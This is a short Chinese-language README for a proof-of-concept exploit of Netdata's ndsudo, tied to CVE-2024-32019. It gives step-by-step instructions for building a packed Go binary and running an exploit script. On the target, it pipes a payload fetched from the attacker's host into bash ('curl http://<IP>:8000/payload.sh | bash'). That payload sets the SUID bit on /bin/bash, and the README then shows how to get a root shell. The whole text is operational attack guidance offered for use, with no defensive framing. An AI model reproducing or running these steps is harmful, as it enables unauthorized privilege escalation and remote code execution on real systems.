Netdata ndsudo 漏洞利用验证 (PoC)
构建二进制文件:
go build -ldflags "-s -w" -o nvme poc.go
upx nvme
运行 bash 脚本:
bash exploit.sh <你的IP地址>
在目标机器上,在可写目录中运行:
curl http://<你的IP地址>:8000/payload.sh | bash
它会自动下载 nvme 二进制文件,导出路径,运行 ndsudo 并给 /bin/bash 添加 SUID 权限。
你可能需要修改 exploit.sh 中的 ndsudo 路径。
要提权,只需运行:
/bin/bash -p
该漏洞利用基于 https://github.com/AzureADTrent/CVE-2024-32019-POC,在我测试时遇到了以下错误:
execve: Exec format error
这就是我决定用 Go 创建自己版本的原因。